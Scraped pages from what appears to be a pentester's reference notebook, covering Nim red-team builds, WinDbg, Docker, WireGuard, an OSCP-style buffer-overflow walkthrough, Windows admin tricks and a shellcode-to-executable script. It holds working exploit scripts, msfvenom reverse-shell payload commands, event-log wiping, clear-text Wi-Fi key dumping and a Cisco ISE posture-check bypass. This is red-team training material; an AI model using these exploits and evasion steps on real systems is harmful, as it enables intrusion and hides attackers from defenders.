[https://nim-lang.org/install\_windows.html](https://nim-lang.org/install_windows.html) * [https://git-scm.com/download/win](https://git-scm.com/download/win) Linux: Copy $ sudo apt install mingw-w64 -y $ sudo apt install nim -y Or $ curl https://nim-lang.org/choosenim/init.sh -sSf | sh Dependencies: Copy Nim > nimble install winim nimcrypto zippy [](https://ppn.snovvcra.sh/red-team/dev/nim#compilation) Compilation ------------------------------------------------------------------------- Basic: To not popup the console window: For the best size: For Windows on Linux: Add the needed relocation section to the resulting executable (from Windows): [](https://ppn.snovvcra.sh/red-team/dev/nim#tools-and-packers) Tools & Packers ----------------------------------------------------------------------------------- * [https://github.com/S3cur3Th1sSh1t/Nim-RunPE](https://github.com/S3cur3Th1sSh1t/Nim-RunPE) * [https://github.com/S3cur3Th1sSh1t/NimGetSyscallStub](https://github.com/S3cur3Th1sSh1t/NimGetSyscallStub) * [https://github.com/chvancooten/NimPackt-v1](https://github.com/chvancooten/NimPackt-v1) * [https://github.com/icyguider/Nimcrypt2](https://github.com/icyguider/Nimcrypt2) * [https://github.com/adamsvoboda/nim-loader](https://github.com/adamsvoboda/nim-loader) Last updated 8 months ago * [Install](https://ppn.snovvcra.sh/red-team/dev/nim#install) * [Compilation](https://ppn.snovvcra.sh/red-team/dev/nim#compilation) * [Tools & Packers](https://ppn.snovvcra.sh/red-team/dev/nim#tools-and-packers) Copy Nim > nim c program.nim Copy Nim > nim c --app:gui program.nim Copy Nim > nim c -d:danger -d:strip --opt:size --passC=-flto --passL=-flto program.nim Copy $ nim c --cpu:amd64 --os:windows --gcc.exe:x86_64-w64-mingw32-gcc --gcc.linkerexe:x86_64-w64-mingw32-gcc program.nim Copy Nim > nim c --passL:-Wl,--dynamicbase,--export-all-symbols program.nim --- # RE | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/exploit-dev/re.md) . [](https://ppn.snovvcra.sh/exploit-dev/re#ghidra) Ghidra ------------------------------------------------------------- Install: * [https://ghidra-sre.org/](https://ghidra-sre.org/) Copy $ mv /opt/tor-browser/Browser/Downloads/ghidra*.zip ~/tools $ cd ~/tools && unzip ghidra*.zip && rm ghidra*.zip && mv ghidra* ghidra && cd - $ sudo apt install openjdk-11-jdk [](https://ppn.snovvcra.sh/exploit-dev/re#frida) Frida ----------------------------------------------------------- * [https://www.issp.com/post/frida-benefits-and-use](https://www.issp.com/post/frida-benefits-and-use) * [https://passthehashbrowns.github.io/using-frida-for-rapid-detection-testing](https://passthehashbrowns.github.io/using-frida-for-rapid-detection-testing) [](https://ppn.snovvcra.sh/exploit-dev/re#python) Python ------------------------------------------------------------- * [https://github.com/extremecoders-re/pyinstxtractor](https://github.com/extremecoders-re/pyinstxtractor) * \[https://pylingual.io/\]https://pylingual.io/() Last updated 1 year ago * [Ghidra](https://ppn.snovvcra.sh/exploit-dev/re#ghidra) * [Frida](https://ppn.snovvcra.sh/exploit-dev/re#frida) * [Python](https://ppn.snovvcra.sh/exploit-dev/re#python) --- # WinDbg | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/exploit-dev/windbg.md) . * [https://blog.talosintelligence.com/unravelling-net-with-help-of-windbg/](https://blog.talosintelligence.com/unravelling-net-with-help-of-windbg/) [](https://ppn.snovvcra.sh/exploit-dev/windbg#install) Install ------------------------------------------------------------------- * [https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/](https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/) * [https://github.com/TimMisiak/windup](https://github.com/TimMisiak/windup) Get the latest version (stolen from [here](https://stackoverflow.com/a/77062861/6253579) ): Copy wget --quiet --continue --no-check-certificate -O windbg.appinstaller https://aka.ms/windbg/download grep -ioP "htt.*bundle" windbg.appinstaller > msix.txt wget --quiet --continue --no-check-certificate -i msix.txt 7z.exe x windbg.msixbundle 7z.exe x *x64.msix -owindbgnew cd windbgnew start dbgx.shell.exe ### [](https://ppn.snovvcra.sh/exploit-dev/windbg#symbols) Symbols * [https://github.com/p0dalirius/pdbdownload](https://github.com/p0dalirius/pdbdownload) [](https://ppn.snovvcra.sh/exploit-dev/windbg#cheatsheet) Cheatsheet ------------------------------------------------------------------------- Load debugging symbols: Unassemble from memory: Read bytes from memory: Read data at a specified address: Dump structures: Edit bytes: Search memory space: Work with registers: Work with software breakpoints: Breakpoints and actions: Work with hardware breakpoints: !\[\[Pasted image 20230924234241.png\]\] Step through code: List modules and symbols: Evaluation and output formats: Pseudo registers: Last updated 1 year ago * [Install](https://ppn.snovvcra.sh/exploit-dev/windbg#install) * [Symbols](https://ppn.snovvcra.sh/exploit-dev/windbg#symbols) * [Cheatsheet](https://ppn.snovvcra.sh/exploit-dev/windbg#cheatsheet) Copy > srv*c:\symbols*https://msdl.microsoft.com/download/symbols > .reload /f Copy > u kernel32!GetCurrentThread Copy > db esp [L1] > db 41414141 > db kernel32!WriteFile > dw esp > dd esp > dq esp > dW/dc KERNELBASE+0x40 Copy > dd esp L1 41414141 > dd 41414141 // The same as pointer to data > dd poi(esp) Copy > dt ntdll!_TEB > dt -r ntdll!_TEB @$teb ThreadLocalStoragePointer > dt -r ntdll!_TEB @$teb > ?? sizeof(ntdll!_TEB) Copy > dd esp L1 > ed esp 41414141 > dd esp L1 > da esp > ea esp "AAAA" > da esp Copy > ed esp 41414141 > s -d 0 L?80000000 41414141 > s -a 0 L?80000000 "This program cannot be run in DOS mode" Copy > r > r eax > r eax=41414141 Copy > bp kernel32!WriteFile > bl > bd 0 > be 0 > bc 0 > bc * > lm m ole32 > bu ole32!WriteStringStream > bl Copy BOOL WriteFile( HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, // Write to file "hello" -> "db esp+0x0c L1" is 04 (length of "hello", also in esi register) LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped ); > bp kernel32!WriteFile ".printf \"The number of bytes written is: %p\", poi(esp + 0x0C);.echo;g" > bp kernel32!WriteFile ".if (poi(esp + 0x0C) != 4) {gc} .else {.printf \"The number of bytes written is 4\";.echo;}" > bp kernel32!WriteFile ".if (@esi != 4) {gc} .else {.printf \"The number of bytes written is 4\";.echo;}" Copy // Before: write "w00tw00t" to a file, save the file, close Notepad, re-open the file > s -a 0x0 L?80000000 w00tw00t > s -u 0x0 L?80000000 w00tw00t > ba w 2 00b8b238 > du 00b8b238 "a00tw00t" Copy > p // step over > t // step into > pt // step to next return > ph // execute code until a branching instruction is reached Copy > .reload /f > lm > lm m kernel* > x kernelbase!CreateProc* Copy > ? ((41414141 - 414141) * 0n10) >> 8 > ? 41414141 > ? 0n41414141 > ? 0y10101010 > .formats 41414141 Copy > r @$t0 = (41414141 - 414141) * 0n10 > ? @$t0 >> 8 --- # Docker | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/admin/virtualization/docker.md) . List all running containers: Copy $ docker ps -a Stop all running containers: Copy $ docker stop `docker container ls -aq` Remove stopped containers: Copy $ docker rm -v `docker container ls -aq -f status=exited` Remove all images: Copy $ docker rmi `docker images -aq` Attach to a running container: Copy $ docker exec -it /bin/bash Unsorted: Copy $ docker start -ai $ docker cp project/. :/root/project $ docker run --rm -it --name ubuntu bash $ docker build -t / . [](https://ppn.snovvcra.sh/admin/virtualization/docker#installation) Installation -------------------------------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/admin/virtualization/docker#linux) Linux #### [](https://ppn.snovvcra.sh/admin/virtualization/docker#docker-engine) docker-engine #### [](https://ppn.snovvcra.sh/admin/virtualization/docker#docker-compose) docker-compose * [https://docs.docker.com/compose/install/#install-compose-on-linux-systems](https://docs.docker.com/compose/install/#install-compose-on-linux-systems) Last updated 4 years ago * [Installation](https://ppn.snovvcra.sh/admin/virtualization/docker#installation) * [Linux](https://ppn.snovvcra.sh/admin/virtualization/docker#linux) Copy $ sudo apt install apt-transport-https ca-certificates curl gnupg-agent software-properties-common -y (Ubuntu) $ curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add - (Kali) $ curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add - [$ sudo apt-key fingerprint 0EBFCD88] (Ubuntu) $ sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" (Kali) $ echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' | sudo tee /etc/apt/sources.list.d/docker.list $ sudo apt update [$ apt-cache policy docker-ce] $ sudo apt install docker-ce -y [$ sudo systemctl status docker] $ sudo usermod -aG docker ${USER} relogin [$ docker run --rm hello-world] Copy $ sudo curl -L "https://github.com/docker/compose/releases/download/1.27.4/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose $ sudo chmod +x /usr/local/bin/docker-compose $ sudo ln -s /usr/local/bin/docker-compose /usr/bin/docker-compose --- # WireGuard | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/admin/networking/wireguard.md) . * [https://upcloud.com/resources/tutorials/get-started-wireguard-vpn](https://upcloud.com/resources/tutorials/get-started-wireguard-vpn) [](https://ppn.snovvcra.sh/admin/networking/wireguard#server) Server ------------------------------------------------------------------------- Quick start: Copy $ sudo apt install wireguard $ sudo vi /etc/sysctl.conf net.ipv4.ip_forward=1 $ sudo sysctl -p $ cd /etc/wireguard && umask 077 $ mkdir clients && cd clients && umask 077 && cd - $ wg genkey | tee privatekey | wg pubkey > publickey Control: Copy $ wg-quick up wg0 $ wg show Enable at boot: Copy $ systemctl enable wg-quick@wg0 $ sudo modprobe wireguard Configuration template: /etc/wireguard Copy [Interface] PrivateKey = Address = 172.16.1.1/24 PostUp = iptables -A FORWARD -i wg0 -j ACCEPT; iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE PostDown = iptables -D FORWARD -i wg0 -j ACCEPT; iptables -t nat -D POSTROUTING -o eth0 -j MASQUERADE ListenPort = 41194 [Peer] ## Client1 PublicKey = AllowedIPs = 172.16.1.2/32 [Peer] ## Client2 PublicKey = AllowedIPs = 172.16.1.3/32 [](https://ppn.snovvcra.sh/admin/networking/wireguard#client) Client ------------------------------------------------------------------------- Generate keys: Configuration template: Restart the server: Last updated 3 years ago * [Server](https://ppn.snovvcra.sh/admin/networking/wireguard#server) * [Client](https://ppn.snovvcra.sh/admin/networking/wireguard#client) Copy $ wg genkey | tee client1 | wg pubkey > client1.pub client.template Copy [Interface] PrivateKey = Address = 172.16.1.2/24 DNS = 1.1.1.1, 1.0.0.1 [Peer] PublicKey = AllowedIPs = 0.0.0.0/0 Endpoint = :41194 PersistentKeepalive = 15 Copy $ sudo systemctl restart wg-quick@wg0 --- # OSCP BOF | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/exploit-dev/bof/oscp-bof.md) . * [https://www.vulnhub.com/entry/brainpan-1,51/](https://www.vulnhub.com/entry/brainpan-1,51/) All you need to know about the BOF challenge for OSCP exam preparation. [](https://ppn.snovvcra.sh/exploit-dev/bof/oscp-bof#id-1.-determine-eip-offset) 1\. Determine EIP Offset ------------------------------------------------------------------------------------------------------------- Generate a unique pattern and feed it to the vulnerable application. bof\_send\_pattern.py Copy #!/usr/bin/env python3 import socket # msf-pattern_create -l 5000 buf = b'' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('10.10.13.37', 1337)) s.send(buf) s.close() Calculate the offset from buffer to EIP overwrite point: Copy $ msf-pattern_offset -l 5000 -q [*] Exact match at offset [](https://ppn.snovvcra.sh/exploit-dev/bof/oscp-bof#id-2.-confirm-bof) 2\. Confirm BOF ------------------------------------------------------------------------------------------- Confirm that you can actually control the EIP value - if true, it will be overwritten with `d34dc0d3`. [](https://ppn.snovvcra.sh/exploit-dev/bof/oscp-bof#id-3.-enumerate-the-bad-characters) 3\. Enumerate the Bad Characters ----------------------------------------------------------------------------------------------------------------------------- Send all the possible byte values to the application. Then in the [Immunity Debugger](https://www.immunityinc.com/products/debugger/) : right click on ESP -> "Follow in Dump" -> check what characters are missing or misinterpreted - they are the **bad characters** that should be excluded when generating the shellcode. [](https://ppn.snovvcra.sh/exploit-dev/bof/oscp-bof#id-4.-build-the-exploit) 4\. Build the Exploit ------------------------------------------------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/exploit-dev/bof/oscp-bof#i.-find-the-return-address) I. Find the Return Address List all loaded modules in process memory space with [mona](https://github.com/corelan/mona) : Choose a module with no memory protections enabled and look for `jmp esp` instruction in that module: Discovered pointer is the needed value for EIP to force the execution flow into the shellcode. ### [](https://ppn.snovvcra.sh/exploit-dev/bof/oscp-bof#ii.-generate-a-shellcode) II. Generate a Shellcode Build a shellcode providing bad characters set from (3): [](https://ppn.snovvcra.sh/exploit-dev/bof/oscp-bof#id-5.-exploit) 5\. Exploit! ------------------------------------------------------------------------------------ Start a netcat listener, feed the shellcode to the application and catch your shell. Last updated 8 months ago * [1\. Determine EIP Offset](https://ppn.snovvcra.sh/exploit-dev/bof/oscp-bof#id-1.-determine-eip-offset) * [2\. Confirm BOF](https://ppn.snovvcra.sh/exploit-dev/bof/oscp-bof#id-2.-confirm-bof) * [3\. Enumerate the Bad Characters](https://ppn.snovvcra.sh/exploit-dev/bof/oscp-bof#id-3.-enumerate-the-bad-characters) * [4\. Build the Exploit](https://ppn.snovvcra.sh/exploit-dev/bof/oscp-bof#id-4.-build-the-exploit) * [I. Find the Return Address](https://ppn.snovvcra.sh/exploit-dev/bof/oscp-bof#i.-find-the-return-address) * [II. Generate a Shellcode](https://ppn.snovvcra.sh/exploit-dev/bof/oscp-bof#ii.-generate-a-shellcode) * [5\. Exploit!](https://ppn.snovvcra.sh/exploit-dev/bof/oscp-bof#id-5.-exploit) bof\_confirm.py Copy #!/usr/bin/env python3 import socket import struct def little_endian(num): return struct.pack(' eip = little_endian(0xd34dc0d3) offset = b'C' * 16 buf = junk + eip + offset s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('10.10.13.37', 1337)) s.send(buf) s.close() bof\_bad\_chars.py Copy #!/usr/bin/env python3 import socket import struct def little_endian(num): return struct.pack(' eip = little_endian(0xd34dc0d3) offset = b'C' * 4 badchars = ( b'\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10' b'\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20' b'\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30' b'\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40' b'\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50' b'\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60' b'\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70' b'\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80' b'\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90' b'\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0' b'\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0' b'\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0' b'\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0' b'\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0' b'\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0' b'\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' ) buf = junk + eip + offset + badchars s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('10.10.13.37', 1337)) s.send(buf) s.close() Copy !mona modules Copy $ msf-nasm_shell nasm > jmp esp 00000000 FFE4 jmp esp Or nasm > call esp 00000000 FFD4 call esp !mona find -s "\xff\xe4" -m "application.exe" Copy $ msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -b "\x00" -f python $ msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -b "\x00" -e x86/shikata_ga_nai -f python $ msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= EXITFUNC=thread -b "\x00" -e x86/shikata_ga_nai -f python bof\_exploit.py Copy #!/usr/bin/env python3 import socket import struct def little_endian(num): return struct.pack(' eip = little_endian(0xd34dc0d3) offset = b'C' * 4 nops = b'\x90' * 10 buf = junk + eip + offset + nops buf += b"" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('10.10.13.37', 1337)) s.send(buf) s.close() --- # Windows | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/admin/windows.md) . [](https://ppn.snovvcra.sh/admin/windows#processes) Processes ------------------------------------------------------------------ Kill process from cmd: Copy Cmd > taskkill /IM:calc.exe /F [](https://ppn.snovvcra.sh/admin/windows#secure-delete) Secure Delete -------------------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/admin/windows#cipher) cipher Copy Cmd > cipher /w:H ### [](https://ppn.snovvcra.sh/admin/windows#sdelete) sdelete File: Copy Cmd > sdelete -p 7 testfile.txt Directory (recursively): Copy Cmd > sdelete -p 7 -s -r "C:\temp" Disk or partition: Copy Cmd > sdelete -p 7 -c H: [](https://ppn.snovvcra.sh/admin/windows#system-perfomance) System Perfomance ---------------------------------------------------------------------------------- [](https://ppn.snovvcra.sh/admin/windows#network) Network -------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/admin/windows#connections-and-routes) Connections and Routes ### [](https://ppn.snovvcra.sh/admin/windows#clean-cache) Clean Cache Hide/unhide computer name on LAN: ### [](https://ppn.snovvcra.sh/admin/windows#disable-nic) Disable NIC [](https://ppn.snovvcra.sh/admin/windows#event-logs) Event Logs -------------------------------------------------------------------- Clean logs with Batch: Clear logs with PS: [](https://ppn.snovvcra.sh/admin/windows#symlinks) Symlinks ---------------------------------------------------------------- [](https://ppn.snovvcra.sh/admin/windows#wi-fi-credentials) Wi-Fi Credentials ---------------------------------------------------------------------------------- * [https://www.nirsoft.net/utils/wireless\_key.html#DownloadLinks](https://www.nirsoft.net/utils/wireless_key.html#DownloadLinks) [](https://ppn.snovvcra.sh/admin/windows#installed-software) Installed Software ------------------------------------------------------------------------------------ [](https://ppn.snovvcra.sh/admin/windows#a-ds) ADS ------------------------------------------------------- [](https://ppn.snovvcra.sh/admin/windows#msc) .msc ------------------------------------------------------- ### [](https://ppn.snovvcra.sh/admin/windows#administrative-tools) Administrative Tools [](https://ppn.snovvcra.sh/admin/windows#krshowkeymgr) KRShowKeyMgr ------------------------------------------------------------------------ Run: [](https://ppn.snovvcra.sh/admin/windows#powershell-secure-strings) PowerShell Secure Strings -------------------------------------------------------------------------------------------------- Encrypt: Decrypt: [](https://ppn.snovvcra.sh/admin/windows#permissions) Permissions ---------------------------------------------------------------------- Take own of a directory and remove it (run cmd.exe as admin): Change ownership of a file: [](https://ppn.snovvcra.sh/admin/windows#dism) DISM -------------------------------------------------------- ### [](https://ppn.snovvcra.sh/admin/windows#telnetclient) TelnetClient [](https://ppn.snovvcra.sh/admin/windows#bitlocker) BitLocker ------------------------------------------------------------------ Check encryption status of all drives (must be elevated): [](https://ppn.snovvcra.sh/admin/windows#cisco-anyconnect) Cisco AnyConnect -------------------------------------------------------------------------------- Bypass ISE Posture host scans on older versions of Cisco AnyConnect Secure Mobility Client: Last updated 9 months ago * [Processes](https://ppn.snovvcra.sh/admin/windows#processes) * [Secure Delete](https://ppn.snovvcra.sh/admin/windows#secure-delete) * [cipher](https://ppn.snovvcra.sh/admin/windows#cipher) * [sdelete](https://ppn.snovvcra.sh/admin/windows#sdelete) * [System Perfomance](https://ppn.snovvcra.sh/admin/windows#system-perfomance) * [Network](https://ppn.snovvcra.sh/admin/windows#network) * [Connections and Routes](https://ppn.snovvcra.sh/admin/windows#connections-and-routes) * [Clean Cache](https://ppn.snovvcra.sh/admin/windows#clean-cache) * [Disable NIC](https://ppn.snovvcra.sh/admin/windows#disable-nic) * [Event Logs](https://ppn.snovvcra.sh/admin/windows#event-logs) * [Symlinks](https://ppn.snovvcra.sh/admin/windows#symlinks) * [Wi-Fi Credentials](https://ppn.snovvcra.sh/admin/windows#wi-fi-credentials) * [Installed Software](https://ppn.snovvcra.sh/admin/windows#installed-software) * [ADS](https://ppn.snovvcra.sh/admin/windows#a-ds) * [.msc](https://ppn.snovvcra.sh/admin/windows#msc) * [Administrative Tools](https://ppn.snovvcra.sh/admin/windows#administrative-tools) * [KRShowKeyMgr](https://ppn.snovvcra.sh/admin/windows#krshowkeymgr) * [PowerShell Secure Strings](https://ppn.snovvcra.sh/admin/windows#powershell-secure-strings) * [Permissions](https://ppn.snovvcra.sh/admin/windows#permissions) * [DISM](https://ppn.snovvcra.sh/admin/windows#dism) * [TelnetClient](https://ppn.snovvcra.sh/admin/windows#telnetclient) * [BitLocker](https://ppn.snovvcra.sh/admin/windows#bitlocker) * [Cisco AnyConnect](https://ppn.snovvcra.sh/admin/windows#cisco-anyconnect) Copy Cmd > perfmon /res Copy Cmd > netstat -b Cmd > netstat -ano Cmd > route print [-4] Copy Cmd > netsh int ip reset Cmd > netsh int tcp reset Cmd > ipconfig /flushdns Cmd > netsh winsock reset Cmd > route -f [Cmd> ipconfig -renew] Copy Cmd > net config server Cmd > net config server /hidden:yes Cmd > net config server /hidden:no (+ reboot) Copy wmic nic get name, index wmic path win32_networkadapter where index= call {disable|enable} Copy for /f %%a in ('WEVTUTIL EL') do WEVTUTIL CL "%%a" Copy ForEach ($log in (Get-WinEvent *).LogName | sort | Get-Unique) { [System.Diagnostics.Eventing.Reader.EventLogSession]::GlobalSession.ClearLog($log) } Copy Cmd > mklink Link Cmd > mklink /D Link Copy > netsh wlan show profiles > netsh wlan show profiles "ESSID" key=clear Copy PS > Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize > InstalledSoftware.txt Copy PS > Get-Item 'file.txt' -Stream * PS > Get-Content 'file.txt' -Stream Password Or PS > type 'file.txt:Password' Copy secpol.msc -- Local Security Policy -- «Локальная политика безопасности» gpedit.msc -- Local Group Policy Editor -- «Редактор локальной групповой политики» lusrmgr.msc -- Local Users and Groups (Local) -- «Локальные пользователи и группы (локально)» certmgr.msc -- Certificates - Current User -- «Сертификаты - текущий пользователь» Copy Cmd > mmc.exe %SystemRoot%\system32\dsa.msc -- Active Directory Users and Computers Cmd > mmc.exe %SystemRoot%\system32\dnsmgmt.msc -- DNS Cmd > mmc.exe %SystemRoot%\system32\gpmc.msc -- Group Policy Management Cmd > mmc.exe %SystemRoot%\system32\adsiedit.msc -- ADSI Edit Copy Cmd > rundll32.exe keymgr.dll, KRShowKeyMgr Copy PS > $securePassword = Read-Host -AsSecureString "Enter password" Enter password: Passw0rd! PS > $encString = $securePassword | ConvertFrom-SecureString PS > $encString 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e179d870f4f6374bab8b8d97c5375ed10000000002000000000010660000000100002000000053096b407f1bb14d6555203b96e0347a12267b69689f4ec6ca38f8533cd0feef000000000e8000000002000020000000d75f103a0d4fd550919f027815fb0fa242e9d5e57a4c25eec436b5e515ea274720000000765dee14954b7bd7d1 34bd5919a35ceab1b8b2fdfbb31fe53a7aa8d1f9078604400000006f63448217f77956c05e0028dd92c2f2466d180b1cc35d05fb760f48e2c0cf125aac944cf099b9995dd6401facaa393d0f9b98ccf3f4daa1386910b8567e7635 Copy PS > $securePassword = ConvertTo-SecureString $encString -Force PS > (New-Object PSCredential 0, $securePassword).GetNetworkCredential().Password Passw0rd! Copy Cmd > takeown /F C:\$Windows.~BT\* /R /A Cmd > icacls C:\$Windows.~BT\*.* /T /grant administrators:F Cmd > rmdir /S /Q C:\$Windows.~BT\ Copy PS > $Acl = Get-ACL $filename PS > $AccessRule = New-Object System.Security.AccessControl.FileSystemAccessRule("snovvcrash", "FullControl", "none", "none", "Allow") PS > $Acl.AddAccessRule($AccessRule) PS > Set-Acl $filename $Acl Copy Cmd > DISM /online /Enable-Feature /FeatureName:TelnetClient Copy Cmd > manage-bde -status Copy Cmd > cd "C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client" Cmd > move aciseposture.exe aciseposture.exe.bak --- # PIC / Shellcode | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/red-team/dev/pic-shellcode.md) . * [https://www.ired.team/offensive-security/code-injection-process-injection/writing-and-compiling-shellcode-in-c](https://www.ired.team/offensive-security/code-injection-process-injection/writing-and-compiling-shellcode-in-c) * [https://www.codeproject.com/Articles/5304605/Creating-Shellcode-from-any-Code-Using-Visual-Stud](https://www.codeproject.com/Articles/5304605/Creating-Shellcode-from-any-Code-Using-Visual-Stud) [![Logo](https://ppn.snovvcra.sh/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=f7842e06&sv=2)GitHub - silentwarble/PIC-Library: A collection of position independent coding resourcesGitHub](https://github.com/silentwarble/PIC-Library) Compile runner with nasm & MinGW (stolen from [PIC-Get-Privileges](https://github.com/paranoidninja/PIC-Get-Privileges/blob/main/runshellcode.asm) ) for testing purposes: Automated with Bash (like [shcode2exe](https://github.com/accidentalrebel/shcode2exe) ): [](https://ppn.snovvcra.sh/red-team/dev/pic-shellcode#development-frameworks) Development Frameworks --------------------------------------------------------------------------------------------------------- * [https://github.com/thefLink/C-To-Shellcode-Examples](https://github.com/thefLink/C-To-Shellcode-Examples) * [https://github.com/rainerzufalldererste/windows\_x64\_shellcode\_template](https://github.com/rainerzufalldererste/windows_x64_shellcode_template) * [https://github.com/oldboy21/SHGenOb](https://github.com/oldboy21/SHGenOb) * [https://github.com/Print3M/epic](https://github.com/Print3M/epic) * [https://github.com/winterknife/SILVERPICK](https://github.com/winterknife/SILVERPICK) ### [](https://ppn.snovvcra.sh/red-team/dev/pic-shellcode#startust-based) Startust-based * [https://5pider.net/blog/2024/01/27/modern-shellcode-implant-design](https://5pider.net/blog/2024/01/27/modern-shellcode-implant-design) * [https://github.com/Cracked5pider/Stardust](https://github.com/Cracked5pider/Stardust) * [https://github.com/Octoberfest7/Secure\_Stager](https://github.com/Octoberfest7/Secure_Stager) * [https://github.com/safedv/Rustic64](https://github.com/safedv/Rustic64) * [https://github.com/NtDallas/Svartalfheim](https://github.com/NtDallas/Svartalfheim) [](https://ppn.snovvcra.sh/red-team/dev/pic-shellcode#tools) Tools ----------------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/red-team/dev/pic-shellcode#binary-ninja-shellcode-compiler-scc) Binary Ninja Shellcode Compiler (SCC) * [https://scc.binary.ninja/](https://scc.binary.ninja/) * [https://github.com/Vector35/scc](https://github.com/Vector35/scc) Last updated 6 months ago * [Development Frameworks](https://ppn.snovvcra.sh/red-team/dev/pic-shellcode#development-frameworks) * [Startust-based](https://ppn.snovvcra.sh/red-team/dev/pic-shellcode#startust-based) * [Tools](https://ppn.snovvcra.sh/red-team/dev/pic-shellcode#tools) * [Binary Ninja Shellcode Compiler (SCC)](https://ppn.snovvcra.sh/red-team/dev/pic-shellcode#binary-ninja-shellcode-compiler-scc) runShellcode.asm Copy ; Compile with: ; nasm -f win64 runShellcode.asm -o runShellcode.o ; x86_64-w64-mingw32-ld runShellcode.o -o runShellcode.exe Global Start Start: incbin "shellcode.bin" bin2compile.sh Copy #!/usr/bin/env bash # Usage: # bin2compile.sh {32|64} [OUTPUT_EXE] # Examples: # msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o calc.bin # bin2compile.sh 64 calc.bin calc.exe ARCH="${1}" SC_PATH=`realpath "${2}"` SC_NAME=`basename "${SC_PATH}"` SC_NAME="${SC_NAME%.*}" [[ "${#}" -gt 2 ]] && EXE_NAME="${3}" || EXE_NAME="${SC_NAME}.exe" cat << EOT > "/tmp/${SC_NAME}.asm" global _start section .text _start: incbin "${SC_PATH}" EOT if [[ "${ARCH}" == "32" ]]; then NASM_ARCH="win32" LD_ARCH="i386pe" elif [[ "${ARCH}" == "64" ]]; then NASM_ARCH="win64" LD_ARCH="i386pep" fi echo "[*] Compiling x${ARCH}" echo "[*] Compilation time: `date "+%F %H:%M:%S"`" nasm -f "${NASM_ARCH}" -o "/tmp/${SC_NAME}.obj" "/tmp/${SC_NAME}.asm" ld -m "${LD_ARCH}" -o "${EXE_NAME}" "/tmp/${SC_NAME}.obj" #-s --subsystem=windows #strip "${EXE_NAME}" if [[ "$?" -ne 1 ]]; then echo "[+] Success" echo "[+] Output size: `stat -c %s ${EXE_NAME} | numfmt --to=iec`" else echo "[-] Failed" fi 